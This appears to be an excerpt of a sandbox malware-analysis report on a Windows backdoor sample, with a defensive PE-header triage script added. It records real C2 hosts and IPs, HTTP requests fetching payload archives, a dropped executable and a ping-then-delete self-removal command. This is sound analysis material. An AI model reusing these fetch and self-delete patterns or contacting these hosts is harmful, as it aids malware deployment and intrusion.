'/|wu>' | 0xc000 | 0x5000 | 0x5000 | b1b31fef029b3b66b3d59ff5e8ac89af | False | 0.642529296875 | data | 6.037548684936156 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
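The section table by itself already carries the facts a triage pass should raise: the entry point 0x40c000 (RVA 0xc000) lies in the last section, '/|wu>', not in .text; that section is marked both IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_WRITE, which a linker does not emit for ordinary code; and its name is not a conventional one. The script below is an added example and is not part of the report or of Joe Sandbox: it builds a minimal PE32 header from the values in this table (constructed input, because the sample itself is not embedded here), parses it with struct only, applies those checks, and decodes the TimeDateStamp field shown under Time Stamp above.

```python
import struct
from datetime import datetime, timezone

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Values copied from the section table and header fields of this report.
# The header bytes are constructed from them; the sample is not embedded.
REPORT_SECTIONS = [  # (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics)
    (b".text", 0x1000, 0x1b83, 0x2000,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x3000, 0x78b6, 0x8000,
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rsrc", 0xb000, 0x0a98, 0x1000,
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b"/|wu>", 0xc000, 0x5000, 0x5000,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]
ENTRYPOINT_RVA = 0x40C000 - 0x400000   # Entrypoint minus Imagebase
TIMESTAMP = 0x54FD77CC


def build_headers(sections, entry_rva, timestamp):
    """Construct a minimal PE32 image header: DOS header, PE signature,
    file header, 0xE0-byte optional header, section table."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x014C, len(sections), timestamp, 0, 0, 0xE0, 0x010F)
    # Magic, linker ver, SizeOfCode, SizeOfInitData, SizeOfUninitData,
    # AddressOfEntryPoint, BaseOfCode, BaseOfData, then ImageBase.
    opt = struct.pack("<HBBIIIIII", 0x010B, 6, 0, 0, 0, 0, entry_rva, 0x1000, 0x3000)
    opt += struct.pack("<I", 0x400000)
    opt += b"\x00" * (0xE0 - len(opt))
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in sections)
    return dos + b"PE\x00\x00" + file_hdr + opt + table


def parse_pe(data):
    """Read the fields the checks need, with struct only (no pefile)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]   # AddressOfEntryPoint
    sections, off = [], opt_off + opt_size
    for _ in range(nsect):
        name, vsize, va, raw, *_unused, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\x00").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw": raw, "chars": chars})
        off += 40
    return {"timestamp": timestamp, "entry_rva": entry_rva, "sections": sections}


def section_for_rva(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"]):
            return s
    return None


def triage(pe):
    """Return human-readable findings; an empty list means nothing odd."""
    findings = []
    secs = pe["sections"]
    ep = section_for_rva(secs, pe["entry_rva"])
    first_code = next((s for s in secs if s["chars"] & IMAGE_SCN_CNT_CODE), None)
    if ep is None:
        findings.append("entry point is outside every section")
    elif first_code is not None and ep is not first_code:
        findings.append(f"entry point in {ep['name']!r}, not in first code section {first_code['name']!r}")
    if ep is not None and ep is secs[-1]:
        findings.append(f"entry point in the last section {ep['name']!r} (appended-code pattern)")
    for s in secs:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s['name']!r} is writable and executable")
        if not all(c.isalnum() or c in "._$" for c in s["name"]):
            findings.append(f"section {s['name']!r} has a non-standard name")
    return findings


def compile_time(pe):
    """TimeDateStamp is seconds since the Unix epoch, in UTC."""
    return datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


if __name__ == "__main__":
    pe = parse_pe(build_headers(REPORT_SECTIONS, ENTRYPOINT_RVA, TIMESTAMP))
    print("compiled:", compile_time(pe))
    for line in triage(pe):
        print("-", line)
```

On the constructed headers the script reports four findings (entry point not in the first code section, entry point in the last section, '/|wu>' writable and executable, '/|wu>' non-standard name) and decodes 0x54FD77CC to 2015-03-09 10:37:00 UTC, matching the Time Stamp line above. Run against a real file, replace the constructed bytes with open(path, "rb").read(); the parser reads only the headers, so it is safe on arbitrary input.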
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb160 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | Chinese | China | 0.33064516129032256
RT_ICON | 0xb448 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | Chinese | China | 0.4391891891891892
RT_DIALOG | 0xb598 | 0x1c6 | data | Chinese | China | 0.5682819383259912
RT_GROUP_ICON | 0xb570 | 0x22 | data | Chinese | China | 1.0
RT_VERSION | 0xb760 | 0x338 | data | French | France | 0.45024271844660196
DLL | Import
MFC42.DLL |
MSVCRT.dll | _controlfp, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, _onexit, __dllonexit, _except_handler3, memset, __p__pgmptr, sprintf, memcpy, _access, __CxxFrameHandler, strstr, _setmbcp, _mkdir
KERNEL32.dll | CloseHandle, CreateFileA, FreeLibrary, GetTickCount, GetFileAttributesA, ExpandEnvironmentStringsA, GetLastError, GetProcAddress, LoadLibraryA, lstrcpyA, GetCommandLineA, Sleep, lstrcmpiA, SetThreadPriority, GetCurrentThread, SetPriorityClass, GetCurrentProcess, GetModuleHandleA, GetStartupInfoA, WriteFile
USER32.dll | SendMessageA, IsIconic, GetClientRect, EnableWindow, LoadIconA, GetSystemMetrics, wsprintfA, DrawIcon
Language of compilation system | Country where language is spoken | Map
Chinese | China |
French | France |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T10:58:58.815691+0100 | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 1 | 192.168.2.4 | 55716 | 1.1.1.1 | 53 | UDP
2024-10-29T10:58:58.815691+0100 | 2814897 | ETPRO MALWARE W32.YoungLotus Checkin | 1 | 192.168.2.4 | 49743 | 119.91.152.151 | 8321 | TCP
2024-10-29T10:58:59.583625+0100 | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 1 | 192.168.2.4 | 49730 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:00.276781+0100 | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 1 | 192.168.2.4 | 49731 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:00.976850+0100 | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 1 | 192.168.2.4 | 49732 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:01.671009+0100 | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 1 | 192.168.2.4 | 49733 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:02.288886+0100 | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 1 | 192.168.2.4 | 49734 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:11.785152+0100 | 2814897 | ETPRO MALWARE W32.YoungLotus Checkin | 1 | 192.168.2.4 | 49735 | 119.91.152.151 | 8321 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 10:58:59.031331062 CET | 49730 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.037146091 CET | 799 | 49730 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:58:59.037249088 CET | 49730 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.052006006 CET | 49730 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.057435989 CET | 799 | 49730 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:58:59.583529949 CET | 799 | 49730 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:58:59.583625078 CET | 49730 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.619582891 CET | 799 | 49730 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:58:59.619726896 CET | 49730 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.622030020 CET | 49730 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.627479076 CET | 799 | 49730 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:58:59.725558043 CET | 49731 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.731234074 CET | 799 | 49731 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:58:59.731331110 CET | 49731 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.731482029 CET | 49731 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:58:59.737152100 CET | 799 | 49731 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.276698112 CET | 799 | 49731 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.276781082 CET | 49731 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:00.311826944 CET | 799 | 49731 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.311897039 CET | 49731 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:00.323430061 CET | 49731 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:00.328959942 CET | 799 | 49731 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.416440964 CET | 49732 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:00.422079086 CET | 799 | 49732 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.422405005 CET | 49732 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:00.426211119 CET | 49732 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:00.431684017 CET | 799 | 49732 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.973638058 CET | 799 | 49732 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:00.976850033 CET | 49732 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.008347988 CET | 799 | 49732 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.008857965 CET | 49732 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.085131884 CET | 49732 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.090738058 CET | 799 | 49732 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.112142086 CET | 49733 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.119769096 CET | 799 | 49733 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.124877930 CET | 49733 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.125066042 CET | 49733 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.131089926 CET | 799 | 49733 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.670881033 CET | 799 | 49733 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.671009064 CET | 49733 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.705343962 CET | 799 | 49733 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.705403090 CET | 49733 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.710223913 CET | 49733 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.715553045 CET | 799 | 49733 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.736068964 CET | 49734 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.741574049 CET | 799 | 49734 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:01.741746902 CET | 49734 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.741947889 CET | 49734 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:01.747263908 CET | 799 | 49734 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:02.286957026 CET | 799 | 49734 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:02.288886070 CET | 49734 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:02.321790934 CET | 799 | 49734 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:02.324898958 CET | 49734 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:02.350955009 CET | 49734 | 799 | 192.168.2.4 | 44.221.84.105
Oct 29, 2024 10:59:02.356461048 CET | 799 | 49734 | 44.221.84.105 | 192.168.2.4
Oct 29, 2024 10:59:03.286133051 CET | 49735 | 8321 | 192.168.2.4 | 119.91.152.151
Oct 29, 2024 10:59:03.291642904 CET | 8321 | 49735 | 119.91.152.151 | 192.168.2.4
Oct 29, 2024 10:59:03.291765928 CET | 49735 | 8321 | 192.168.2.4 | 119.91.152.151
Oct 29, 2024 10:59:03.482254982 CET | 49735 | 8321 | 192.168.2.4 | 119.91.152.151
Oct 29, 2024 10:59:03.487755060 CET | 8321 | 49735 | 119.91.152.151 | 192.168.2.4
Oct 29, 2024 10:59:11.784923077 CET | 8321 | 49735 | 119.91.152.151 | 192.168.2.4
Oct 29, 2024 10:59:11.784993887 CET | 49735 | 8321 | 192.168.2.4 | 119.91.152.151
Oct 29, 2024 10:59:11.785151958 CET | 49735 | 8321 | 192.168.2.4 | 119.91.152.151
Oct 29, 2024 10:59:12.287389040 CET | 49743 | 8321 | 192.168.2.4 | 119.91.152.151
Oct 29, 2024 10:59:12.292937994 CET | 8321 | 49743 | 119.91.152.151 | 192.168.2.4
                                                                                                              Oct 29, 2024 10:59:12.293096066 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:12.339306116 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:12.344947100 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:00:02.813931942 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:00:02.865097046 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 11:01:02.907212973 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:01:02.959022999 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 11:02:02.998500109 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:02:03.052860975 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 11:03:03.093449116 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:03:03.146815062 CET497438321192.168.2.4119.91.152.151
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 10:58:58.815690994 CET | 55716 | 53 | 192.168.2.4 | 1.1.1.1
Oct 29, 2024 10:58:59.005286932 CET | 53 | 55716 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 10:58:58.815690994 CET | 192.168.2.4 | 1.1.1.1 | 0x227d | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 10:58:59.005286932 CET | 1.1.1.1 | 192.168.2.4 | 0x227d | No error (0) | ddos.dnsnb8.net | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
• ddos.dnsnb8.net:799

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 44.221.84.105 | 799 | 6180 | C:\Users\user\AppData\Local\Temp\XekSuT.exe

Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 10:58:59.052006006 CET | 288 | OUT | GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 44.221.84.105 | 799 | 6180 | C:\Users\user\AppData\Local\Temp\XekSuT.exe

Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 10:58:59.731482029 CET | 288 | OUT | GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 44.221.84.105 | 799 | 6180 | C:\Users\user\AppData\Local\Temp\XekSuT.exe

Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 10:59:00.426211119 CET | 288 | OUT | GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 44.221.84.105 | 799 | 6180 | C:\Users\user\AppData\Local\Temp\XekSuT.exe

Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 10:59:01.125066042 CET | 288 | OUT | GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 44.221.84.105 | 799 | 6180 | C:\Users\user\AppData\Local\Temp\XekSuT.exe

Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 10:59:01.741947889 CET | 288 | OUT | GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive


Target ID: 0
Start time: 05:58:57
Start date: 29/10/2024
Path: C:\Users\user\Desktop\gE4NVCZDRk.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\gE4NVCZDRk.exe"
Imagebase: 0x400000
File size: 69'632 bytes
MD5 hash: 02B3757B29002A8FCABD9AFAEBF1F7D3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 05:58:57
Start date: 29/10/2024
Path: C:\Users\user\AppData\Local\Temp\XekSuT.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\XekSuT.exe
Imagebase: 0x3c0000
File size: 15'872 bytes
MD5 hash: 56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 97%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 2
Start time: 05:58:57
Start date: 29/10/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
Imagebase: 0xac0000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 05:58:57
Start date: 29/10/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
Imagebase: 0xac0000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 05:58:59
Start date: 29/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 05:58:59
Start date: 29/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 05:58:59
Start date: 29/10/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 1
Imagebase: 0xcf0000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 05:59:01
Start date: 29/10/2024
Path: C:\Windows\SysWOW64\SySyeu.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread
Imagebase: 0xe10000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: high
Has exited: false

Target ID: 8
Start time: 05:59:03
Start date: 29/10/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 05:59:03
Start date: 29/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
Imagebase: 0x3f0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:05:59:03
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456
                                                                                                              Imagebase:0x3f0000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:14
                                                                                                              Start time:06:00:18
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:wmiadap.exe /F /T /R
                                                                                                              Imagebase:0x7ff70f2a0000
                                                                                                              File size:182'272 bytes
                                                                                                              MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:30.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:10.7%
                                                                                                                Total number of Nodes:187
                                                                                                                Total number of Limit Nodes:5

                                                                                                                Callgraph


                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040C223
                                                                                                                • WriteFile.KERNELBASE(00000000,FFFF6661,00003E00,?,00000000), ref: 0040C252
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0040C256
                                                                                                                • WinExec.KERNEL32(?,00000005), ref: 0040C262
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateExecHandleWrite
                                                                                                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XekSuT.exe$athA$catA$dleA$el32$lstr$odul
                                                                                                                • API String ID: 3741012433-1337179472
                                                                                                                • Opcode ID: eb1dc1aab9616a873a9176c867fcb90dca47bb34ce89b5d6d60bc17a18132d92
                                                                                                                • Instruction ID: 4eef44a04be80027630e64d62b81b4b0f7cb2a7a9c358aa5d242a05e89df5a28
                                                                                                                • Opcode Fuzzy Hash: eb1dc1aab9616a873a9176c867fcb90dca47bb34ce89b5d6d60bc17a18132d92
                                                                                                                • Instruction Fuzzy Hash: F461F574D01215DBCF24CF94C884AAEB7B0BB48715F2582ABD405BB782C7789E81CF99

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004017A8
                                                                                                                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004017BA
                                                                                                                • GetProcAddress.KERNEL32(?,Process32First), ref: 004017CF
                                                                                                                • GetProcAddress.KERNEL32(?,Process32Next), ref: 004017E1
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004017F5
                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00401819
                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 0040182C
                                                                                                                • lstrcmpiA.KERNEL32(00000000,?), ref: 00401843
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0040185C
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040186C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
